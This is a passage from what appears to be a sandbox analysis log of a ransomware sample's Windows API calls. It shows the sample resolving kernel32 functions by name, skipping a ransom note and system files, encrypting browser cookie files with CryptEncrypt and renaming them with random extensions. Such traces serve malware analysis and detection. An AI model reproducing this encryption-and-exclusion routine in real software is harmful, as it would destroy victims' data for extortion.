| out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.608] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.608] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.608] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.608] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.608] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.608] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.608] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.608] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.608] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.608] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.608] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.608] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.609] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.609] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.609] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.609] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.609] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.609] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.609] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.609] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.609] lstrlenA (lpString="DELETEATOM") returned 10 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.609] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.609] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.609] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.609] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.610] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.610] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.610] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.610] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.610] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.610] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.610] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.610] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.610] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.610] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.610] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.610] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.610] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.610] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.610] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.610] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.610] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.610] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.610] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.611] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.611] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.611] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.611] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.611] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.611] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.611] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.611] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.611] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.611] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.611] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.611] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.611] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.611] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.611] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.611] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.611] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.611] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.611] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.611] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.612] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.612] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.612] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R") returned 116 [0181.612] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R.UGKk3Br") returned 124 [0181.612] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4r"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R.UGKk3Br" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4r.ugkk3br"), dwFlags=0x0) returned 1 [0181.613] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.613] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.613] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.613] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x517fd8b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x51332930, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0xab67ef40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x22d, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", cAlternateFileName="5P5NRG~1.XOA")) returned 1 [0181.613] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", lpString2="DECRYPT-FILES.txt") returned -1 [0181.613] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", lpString2="autorun.inf") returned -1 [0181.613] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", lpString2="boot.ini") returned -1 [0181.613] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", lpString2="desktop.ini") returned -1 [0181.613] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", lpString2="ntuser.dat") returned -1 [0181.613] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", lpString2="iconcache.db") returned -1 [0181.613] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", lpString2="bootsect.bak") returned -1 [0181.613] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", lpString2="ntuser.dat.log") returned -1 [0181.613] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", lpString2="thumbs.db") returned -1 [0181.613] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli", lpString2="Bootfont.bin") returned -1 [0181.613] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli") returned 46 [0181.614] lstrcmpiW (lpString1="xOAIli", lpString2="lnk") returned 1 [0181.614] lstrcmpiW (lpString1="xOAIli", lpString2="exe") returned 1 [0181.614] lstrcmpiW (lpString1="xOAIli", lpString2="sys") returned 1 [0181.614] lstrcmpiW (lpString1="xOAIli", lpString2="dll") returned 1 [0181.614] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.614] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli") returned 46 [0181.614] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.614] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli" [0181.614] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.614] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.xOAIli" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt.xoaili"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.614] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=557) returned 1 [0181.614] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.614] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.615] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.615] CloseHandle (hObject=0x288) returned 1 [0181.615] CloseHandle (hObject=0x284) returned 1 [0181.615] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.616] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54cce0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54cce0d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xab6a50a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", cAlternateFileName="5P5NRG~1.QIK")) returned 1 [0181.616] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", lpString2="DECRYPT-FILES.txt") returned -1 [0181.616] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", lpString2="autorun.inf") returned -1 [0181.616] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", lpString2="boot.ini") returned -1 [0181.616] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", lpString2="desktop.ini") returned -1 [0181.616] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", lpString2="ntuser.dat") returned -1 [0181.616] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", lpString2="iconcache.db") returned -1 [0181.616] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", lpString2="bootsect.bak") returned -1 [0181.616] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", lpString2="ntuser.dat.log") returned -1 [0181.616] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", lpString2="thumbs.db") returned -1 [0181.616] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN", lpString2="Bootfont.bin") returned -1 [0181.616] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN") returned 43 [0181.616] lstrcmpiW (lpString1="qIkVSN", lpString2="lnk") returned 1 [0181.616] lstrcmpiW (lpString1="qIkVSN", lpString2="exe") returned 1 [0181.616] lstrcmpiW (lpString1="qIkVSN", lpString2="sys") returned -1 [0181.616] lstrcmpiW (lpString1="qIkVSN", lpString2="dll") returned 1 [0181.616] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.616] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN") returned 43 [0181.616] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.616] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN" [0181.616] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qikvsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.617] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=485) returned 1 [0181.617] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.617] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.617] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.617] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.617] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.618] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.618] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.618] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.618] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.619] CloseHandle (hObject=0x288) returned 1 [0181.619] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.619] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.620] CloseHandle (hObject=0x0) returned 0 [0181.620] CloseHandle (hObject=0x284) returned 1 [0181.620] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.620] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.620] GetTickCount () returned 0x1134cba [0181.620] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.620] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.620] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.621] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.621] lstrlenA (lpString="kernel32.dll") returned 12 [0181.621] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.621] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.621] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.621] 